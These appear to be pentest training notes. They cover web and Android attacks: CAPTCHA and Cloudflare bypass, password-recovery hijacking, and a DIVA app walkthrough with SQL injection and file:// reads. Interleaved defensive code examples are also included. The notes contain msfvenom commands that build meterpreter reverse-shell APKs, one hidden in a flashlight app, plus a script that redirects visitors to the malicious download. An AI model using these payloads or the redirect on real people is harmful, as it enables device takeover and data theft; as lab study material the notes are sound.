Tamper Data, Burp Suite
md5sum filename
CAPTCHA bypass: submit the form without filling in the CAPTCHA at all
CAPTCHA value stored in cookies
validate one CAPTCHA manually, then reuse the same CAPTCHA every time within that session
the CAPTCHA turns out to be repeating
== Threats to a pharmaceutical company ==
-government/regulations
-criminal organizations
-competition
-Chinese APT
-unfair market
-blackmail
-insider threats
mobile front: XML
mobile API: Android, iOS, BlackBerry
logging: ELK stack, Splunk, QRadar, GFI, SolarWinds
databases: MS SQL, MySQL, Oracle, DB2 etc.
backend: PHP, ASP, Python etc.
middleware
front end
== Threat actors in the case of a news media company ==
politics
competition
black hats
availability
reputation
market share
REMEDIATION
Insecure Direct Object Reference (IDOR)
172.16.60.85
172.16.60.88
Download Nessus from here. Choose the Ubuntu packages (or the Debian ones)
Open a Terminal and go to the download directory (cd)
Run sudo dpkg -i Nessus*.deb. Enter root password.
Start it sudo /etc/init.d/nessusd start
Open a browser and go to https://localhost:8834/
17.10.2018
Broken Authentication
Password recovery function
modify the email the OTP is sent to, replacing it with an email we have access to
open the email
it asks to open a new email
create a new email
replace it with the newly created email
intercept the request and insert the new email
the function finds the email is open
it sends the confirmation, asking where to send the confirmation
modify this confirmation to the new email and the confirmation goes to the new email
every email in the Facebook database is a new unique ID
this only works with new emails
SQL injection
sensitive data exposure
bypassing Cloudflare
trying to find subdomains
finding misconfigurations
looking at the domain's history (which IP it had before going behind Cloudflare); it is recommended to change the IP before going behind CF
brute-forcing subdomains; it is recommended to put all subdomains behind it
a full path in the URL shows what can be attacked on that server
XML and XXE attack
bypass WAF
check for encoders
check for SQL injection with the symbols " and '
Security Misconfiguration
NAT: all ports NATed to one port
SSH open
admin page exposed externally
device console unprotected
22.10.2018
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.65.141 LPORT=9999 R> king2.apk
insert into index.html:
<script>
window.location.assign("update.apk");
</script>
test with Android by uploading the malware to an Android device and using meterpreter to manage the session
when someone visits the page they are redirected to update.apk
mitmf ???
26.10.2018
msfvenom -x flashlight.apk -p android/meterpreter/reverse_tcp LHOST=172.16.60.69 LPORT=9559 R> flash-light.apk
29.10.2018
import requests
payload = {"username": "jack", "password": "P@ssw0rd", "from_acc": "5555555", "to_acc": "999999", "amount": "10"}
r = requests.post("http://127.0.0.1:8888/dotransfer", data=payload)
print(r.text)
python sendMN.py
### test if we can view account state
/getaccounts
nano getA.py
import requests
payload = {"username": "dinesh", "password": "P@ssw0rd"}
r = requests.post("http://127.0.0.1:8888/getaccounts", data=payload)
print(r.text)
with Burp we validate the changepassword request
intercept the request when you change the password
nano changePassword.py
import requests
payload = {"username": "jack", "newpassword": "Password"}
r = requests.post("https://127.0.0.1:8888/changepassword", data=payload)
print(r.text)
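Added example, not from these notes and not the bank app's own code: the server-side counterpart to the two broken-authentication cases above, the recovery flow whose confirmation address could be swapped for one we control, and the /changepassword request that accepted a bare username. The account store, session table, OTP table and mail sender are constructed in-memory stand-ins, and all function names are assumptions of this example.

```python
import hashlib
import hmac
import secrets
import time

# Constructed in-memory stand-ins for the app's user table, session table,
# OTP table and mail sender. None of this is the bank app's own code.
ACCOUNTS = {"jack": {"email": "jack@example.com", "pw_hash": None}}
SESSIONS = {}   # session token -> username
OTPS = {}       # username -> (otp, expiry timestamp)
OUTBOX = []     # (recipient, message) pairs "sent" by the stand-in mailer
OTP_TTL_SECONDS = 300
PBKDF2_ROUNDS = 100_000


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def set_password(username: str, password: str) -> None:
    salt = secrets.token_bytes(16)
    ACCOUNTS[username]["pw_hash"] = (salt, _hash_password(password, salt))


def check_password(username: str, password: str) -> bool:
    salt, expected = ACCOUNTS[username]["pw_hash"]
    return hmac.compare_digest(_hash_password(password, salt), expected)


def login(username: str, password: str):
    """Return a session token on success, None otherwise."""
    if username not in ACCOUNTS or not check_password(username, password):
        return None
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = username
    return token


def change_password(session_token: str, old_password: str, new_password: str) -> bool:
    """Contrast with the /changepassword request above, which accepted a bare
    username. Here the account comes from the session, not the request body,
    and the current password must be proven before it can be replaced."""
    username = SESSIONS.get(session_token)
    if username is None or not check_password(username, old_password):
        return False
    set_password(username, new_password)
    # Every other session of this account is revoked after the change.
    for tok, user in list(SESSIONS.items()):
        if user == username and tok != session_token:
            del SESSIONS[tok]
    return True


def start_recovery(username: str, requested_email: str, now: float = None) -> bool:
    """Contrast with the recovery flow above: the email field the client sends
    is ignored on purpose, so tampering with it in Burp cannot redirect the
    code. The OTP goes only to the address already on file."""
    now = time.time() if now is None else now
    account = ACCOUNTS.get(username)
    if account is None:
        return False   # the HTTP layer should still answer as if it succeeded
    otp = f"{secrets.randbelow(10**6):06d}"
    OTPS[username] = (otp, now + OTP_TTL_SECONDS)
    OUTBOX.append((account["email"], f"Your recovery code is {otp}"))
    return True


def finish_recovery(username: str, otp: str, new_password: str, now: float = None) -> bool:
    """Consume the OTP (single use), reject it once expired, then reset."""
    now = time.time() if now is None else now
    record = OTPS.pop(username, None)
    if record is None:
        return False
    expected, expiry = record
    if now > expiry or not hmac.compare_digest(expected, otp):
        return False
    set_password(username, new_password)
    return True


set_password("jack", "P@ssw0rd")   # constructed starting credential

if __name__ == "__main__":
    tok = login("jack", "P@ssw0rd")
    print("unauthenticated change accepted:", change_password("bogus", "P@ssw0rd", "x"))
    print("authenticated change accepted:", change_password(tok, "P@ssw0rd", "NewPass1"))
    start_recovery("jack", "attacker@example.net")
    print("recovery code went to:", OUTBOX[-1][0])
```

The two checks a tester would repeat against this design are the ones the notes describe: replaying the change-password request without a session, and changing the email field of the recovery request. Both are expected to fail, and the recovery code can be used once only and only before it expires.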
adb shell
adb pull
adb push
pm list packages
am start -n
am start -n com.android.insecurebankv2/.Postlogin
am start -n jakhar.aseem.diva
apktool d name.apk
31.10.2018
choose one ..
exploit it
document it
## insecure logging
## check by entering a CC number and then seeing whether the CC number shows up with the command below
# adb logcat | grep credit
## if you see the CC number in plain text, this counts as vulnerable
apktool d diva.apk -o diva-extracted
in the extracted folder: cat HardcodeActivity.smali
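Added example, not from the notes and not part of DIVA: a small scanner that runs over logcat-style lines and flags Luhn-valid, card-number-shaped digit runs, reporting them masked. It generalises the `grep credit` step above, catching a number that is not labelled "credit" while skipping ordinary long ids. The sample log lines are constructed, not captured from a device.

```python
import re
import sys

# Constructed sample of `adb logcat` output; not captured from a real device.
# Line 2 leaks a full card number in clear text, line 4 carries a 13-digit
# request id that must not be flagged.
SAMPLE_LOGCAT = """\
D/DivaJni ( 1234): onClick: saving credit card
E/CreditCard( 1234): credit card: 4111111111111111 exp 12/24
I/ActivityManager( 567): Displayed jakhar.aseem.diva/.LogActivity: +120ms
D/Network ( 1234): request id 1234567890123 completed
"""

# 13 to 19 digits, optionally separated by single spaces or dashes,
# not glued to further digits on either side.
CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn check-digit test: true for 4111111111111111, false for most other digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(digits: str) -> str:
    """The form the app should log, if it must log anything: BIN and last four only."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def find_pans(log_text: str):
    """Return (line number, masked PAN) for every Luhn-valid card-number-shaped
    run in the log. Only the masked form is returned, so the scanner's own
    output does not become a second copy of the leak."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for m in CANDIDATE.finditer(line):
            digits = re.sub(r"\D", "", m.group())
            if luhn_ok(digits):
                hits.append((lineno, mask_pan(digits)))
    return hits


if __name__ == "__main__":
    # Pipe real output through it:  adb logcat -d | python3 find_pans.py
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LOGCAT
    for lineno, masked in find_pans(text):
        print(f"line {lineno}: possible card number {masked}")
```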
3. insecure data storage - part 1
adb shell # be sure the OS is rooted
create user/pass
su - to get root access
cd /data/data/jakhar.aseem.diva/shared_prefs
ls
cat *.xml
:) you will see user and pass in plain text
4.
adb shell
create user/pass
cd /data/data/jakhar.aseem.diva/
ls, then cd databases
ids2 chosen
adb pull /data/data/jakhar.aseem.diva/databases/ids2
file ids2 ## SQLite 3 is found
sqlite3 ids2
.tables
select * from myuser;
5.
adb shell
create user/pass
cd /data/data/jakhar.aseem.diva/
when the user is created, a file named uinfo23423j2tmp appears
cat uinfo23423j2tmp
:) you will see the user/pass created in the app
6.
adb shell
grant storage access to the DIVA app
create user/pass
cd /mnt/sdcard
cat .uinfo.txt
:) you will see the user/pass created in the app
7.
search 1'or'1'='1
this will query for all users in the database
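Added example, not from the notes and not DIVA's code, covering both the SQL injection item and the `"` / `'` probe listed earlier: an in-memory SQLite database with the myuser table from above, a search written by string concatenation next to the same search with a bound parameter, and the lone-quote probe turned into a regression test. The rows are constructed.

```python
import sqlite3

# Constructed stand-in for the app's SQLite database. The table name myuser
# comes from the notes above; the rows are made up.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE myuser (user TEXT, password TEXT)")
    conn.executemany("INSERT INTO myuser VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2"), ("carol", "pa55")])
    return conn


def search_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    # The search term is concatenated into the statement, so a quote in the
    # input closes the literal and the rest is parsed as SQL.
    sql = "SELECT user FROM myuser WHERE user = '" + name + "' ORDER BY user"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn: sqlite3.Connection, name: str) -> list:
    # A bound parameter is always a value, never SQL grammar, whatever it contains.
    rows = conn.execute("SELECT user FROM myuser WHERE user = ? ORDER BY user", (name,))
    return [row[0] for row in rows]


def quote_breaks_query(conn: sqlite3.Connection, search) -> bool:
    """The ' probe from the notes as a regression test: a lone quote raising a
    syntax error means the input reaches the parser unescaped."""
    try:
        search(conn, "'")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    conn = make_db()
    probe = "1'or'1'='1"
    print("vulnerable:", search_vulnerable(conn, probe))
    print("safe:      ", search_safe(conn, probe))
    print("quote breaks vulnerable query:", quote_breaks_query(conn, search_vulnerable))
    print("quote breaks safe query:      ", quote_breaks_query(conn, search_safe))
```

With the concatenated query the search string `1'or'1'='1` returns every row, exactly as item 7 says; with the bound parameter the same string is just a user name that does not exist and returns nothing.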
8.
view a URL, e.g. https://www.google.com
then you will be able to view or move through directories
e.g. file:// or file://etc/filename
file:///etc/hosts
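Added example, not from the notes and not DIVA's code: the check an in-app browser should apply before loading a user-supplied URL, so that the file:// inputs above are refused. The allowed-scheme set is a constructed policy for this example; the function names are mine.

```python
from urllib.parse import urlsplit

# Schemes the in-app browser may load. Constructed policy for this example;
# file, content, javascript, data and plain http are deliberately absent.
ALLOWED_SCHEMES = {"https"}


def is_safe_to_load(url: str) -> bool:
    """Return True only for an absolute URL with an allowed scheme and a host.

    Covers the cases from the notes: file:///etc/hosts and file://etc/filename
    have the wrong scheme; scheme names are compared case-insensitively so
    FILE:// is not a way round; https:/// with no host is also refused."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:        # e.g. an unbalanced IPv6 bracket
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    if not parts.hostname:    # scheme-relative, relative, or host-less URL
        return False
    return True


def filter_urls(urls):
    """Split a batch of candidate URLs into (allowed, refused) lists."""
    allowed, refused = [], []
    for u in urls:
        (allowed if is_safe_to_load(u) else refused).append(u)
    return allowed, refused


if __name__ == "__main__":
    # Constructed inputs, including the ones from the notes above.
    ok, bad = filter_urls([
        "https://www.google.com",
        "file:///etc/hosts",
        "file://etc/filename",
        "FILE:///etc/hosts",
        "javascript:alert(1)",
        "//www.google.com",
        "https:///etc/hosts",
    ])
    print("allowed:", ok)
    print("refused:", bad)
```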